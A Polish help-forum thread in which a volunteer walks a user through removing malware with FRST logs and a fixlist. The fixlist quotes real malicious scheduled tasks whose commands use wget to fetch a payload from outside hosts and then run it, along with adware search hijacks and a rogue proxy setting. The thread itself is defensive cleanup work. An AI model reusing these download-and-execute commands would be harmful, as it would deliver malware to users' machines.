kolobos Re: Log do oceny.. 06.02.15, 21:45 Wystarczy RAZ napisac. Do tego brakuje addition.txt. Odpowiedz Link Zgłoś
fuiio Re: Log do oceny.. 06.02.15, 22:46 Sorki Mistrzu, myslalem ,ze mnie nikt nie zauwazyl.. Nie wiem czy chodzilo Ci o log z tego programu malware czy jakis inny? zalaczam log z malware.. wklej.org/id/1626999/ Odpowiedz Link Zgłoś
kolobos Re: Log do oceny.. 06.02.15, 22:55 Dlaczego nie wiesz? Przeciez w podwieszonym watku masz jasno podane, ze frst.txt oraz addition.txt tworzy FRST, wiec nie wiem po co dajesz log z mbam. Odpowiedz Link Zgłoś
fuiio Re: Log do oceny.. 06.02.15, 23:39 nie widzialem jakos tej opcji..teraz jest komplet.. wklej.org/id/1627061/ wklej.org/id/1627064/ Odpowiedz Link Zgłoś
kolobos Re: Log do oceny.. 07.02.15, 00:41 Odinstaluj: Eusing Free Registry Cleaner Java(TM) 6 Update 29 Obok frst.exe utworz plik fixlist.txt z zawartoscia: Task: {15225383-F78D-46AA-B44F-B980520BBC8A} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp iashdb.in/index.php?data=nSDagsDIOG;up;1421913803 & start cmd /R dat.bmp Task: {72F8DC7A-00D0-4524-89EB-4543A224EFDF} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp sdshdb.nl/index.php?data=U2qpZHWf1F;up;1421913813 & start cmd /R dat.bmp Task: {904B1698-38B3-4BE3-84FE-A44E38076F51} - \AdobeFlashPlayerUpdate No Task File <==== ATTENTION Task: {E5F3F836-5F7A-42D9-B99F-0BB0B4670859} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp grogle.in/dat.bmp?data=1HupDX8AWb;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1421756713 & start cmd /R dat.bmp <==== ATTENTION () C:\Program Files (x86)\Tor\tor.exe HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0\...\Run: [fsm] => [X] HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0\Software\Microsoft\Internet Explorer\Main,ICQ Search = http://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {00000000-6E41-4FD3-8538-502F5495E5FC} - No File URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {fc01c2be-850b-4115-9b6b-9a427ddecc34} - No File URLSearchHook: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 - (No Name) - {40c3cc16-7269-4b32-9531-17f2950fb06f} - No File SearchScopes: HKLM -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF SearchScopes: HKLM-x32 -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF SearchScopes: HKU\.DEFAULT -> {114F1C55-C7A9-4A0D-B1C6-0FF5223FE042} URL = SearchScopes: HKU\.DEFAULT -> {90E96A71-522E-457D-9C51-62A63A820610} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> Plasmoo URL = http://plasmoo.com/index.htm?SearchMashine=true&q={searchTerms} SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {6552C7DD-90A4-4387-B795-F8F96747DE19} URL = http://search.icq.com/search/results.php?q={searchTerms}&ch_id=osd SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {8A96AF9E-4074-43b7-BEA3-87217BDA7406} URL = http://www.searchqu.com/web?src=ieb&systemid=406&q={searchTerms} SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {90E96A71-522E-457D-9C51-62A63A820610} URL = http://de.wikipedia.org/wiki/Special:Search?search={searchTerms} SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = http://www.daemon-search.com/search/web?q={searchTerms} SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2304157 SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {C7576B9D-B442-46bc-AF74-080A9E723E01} URL = http://websearch.search-results.com/redirect?client=ie&tb=STC-SRS&o=41648033&src=crm&q={searchTerms}&locale=de_DE&apn_ptnrs=96&apn_dtid=YYYYYYYYDE&apn_uid=8DD0CB95-F756-4257-8A87-471817A3DF21&apn_sauid=5201C84C-128E-45C5-9ECE-FE7E319C1292 SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {E08A9998-D98F-476f-8F5C-37C80FE0A4DA} URL = http://search.conduit.com/?SearchSource=10&ctid=CT2528046 SearchScopes: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> {E840768E-33E7-4068-ABDB-104D6397779A} URL = http://de.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF BHO-x32: No Name -> {451C804F-C205-4F03-B48E-537EC94937BF} -> No File Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {32099AAC-C132-4136-9E9A-4E364A424E17} - No File Toolbar: HKU\S-1-5-21-3470683543-1908837710-3640973478-1005-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-0 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File FF NetworkProxy: "http", "194.213.52.202" FF NetworkProxy: "http_port", 3128 FF NetworkProxy: "type", 2 FF Extension: No Name - C:\Users\Mike Lorenzen\AppData\Roaming\Mozilla\Firefox\Profiles\89fruptw.default\extensions\{d43723ae-1ae1-4a25-a6a4-bf0929273cab} [Not Found] FF Extension: No Name - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com [Not Found] FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found] CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hp&ts=1422912556&from=cor&uid=HitachiXHDS721010CLA332_JP2940HD3WBVAC3WBVACX" CHR Extension: (Delta Toolbar) - C:\Users\Mike Lorenzen\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\eooncjejnppfjjklapaamhcdmjbilmde [2013-04-07] CHR Extension: (BrowserProtect) - C:\Users\Mike Lorenzen\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pgafcinpmmpklohkojmllohdhomoefph [2013-04-07] CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - No Path CHR HKLM-x32\...\Chrome\Extension: [hfjckbbeondgbgemllebneccphndhhda] - No Path R2 tor; C:\Program Files (x86)\Tor\tor.exe [3233806 2013-08-23] () [File not signed] <==== ATTENTION U3 DfSdkS; No ImagePath S3 dump_wmimmc; \??\C:\Program Files (x86)\SEGA\PHANTASY STAR UNIVERSE\GameGuard\dump_wmimmc.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X] S3 X6va005; \??\C:\Users\MIKELO~1\AppData\Local\Temp\005F112.tmp [X] 2015-02-02 22:29 - 2015-02-02 22:29 - 00000179 _____ () C:\Users\Mike Lorenzen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url 2015-02-02 22:29 - 2015-02-02 22:29 - 00000000 ___HD () C:\Users\Mike Lorenzen\AppData\Roaming\GoldenGate C:\Windows\SysWOW64\sho*.tmp 2015-02-06 18:46 - 2013-09-22 01:27 - 00000000 ____D () C:\AdwCleaner EmptTemp: W FRST wybierz Fix. Po wykonaniu daj now Odpowiedz Link Zgłoś
kolobos Re: Log do oceny.. 07.02.15, 00:42 Po wykonaniu daj nowe logi ze skanowania z FRST. Odpowiedz Link Zgłoś
fuiio Re: Log do oceny.. 08.02.15, 09:56 Musialem niesty wybyc na 1 dobe na pogrzeb.. Oto log po fixie.. wklej.org/id/1628556/ Odpowiedz Link Zgłoś
Gość: Kolobos Re: Log do oceny.. IP: *.zask.pl 08.02.15, 10:10 Miales dac nowe logi z FRST, ze skanowana, a nie log z wykonania skryptu. Odpowiedz Link Zgłoś
fuiio Re: Log do oceny.. 08.02.15, 10:15 wklej.org/id/1628563/ wklej.org/id/1628564/ Odpowiedz Link Zgłoś
fuiio Re: Log do oceny.. 12.02.15, 11:11 Reklamy znikly. Jezeli nie mam juz zadnych patologii w komputerze to serdecznie dziekuje Ci Kolobosie. W razie czego pomoge rozwiazac problem muzyczny albo motoryzacyjny..Pozdrawiam goraco Odpowiedz Link Zgłoś
Gość: Kolobos Re: Log do oceny.. IP: *.internetdsl.tpnet.pl 12.02.15, 11:21 Wszystko juz wyglada ok. Usun katalog C:\FRST i to wszystko. Odpowiedz Link Zgłoś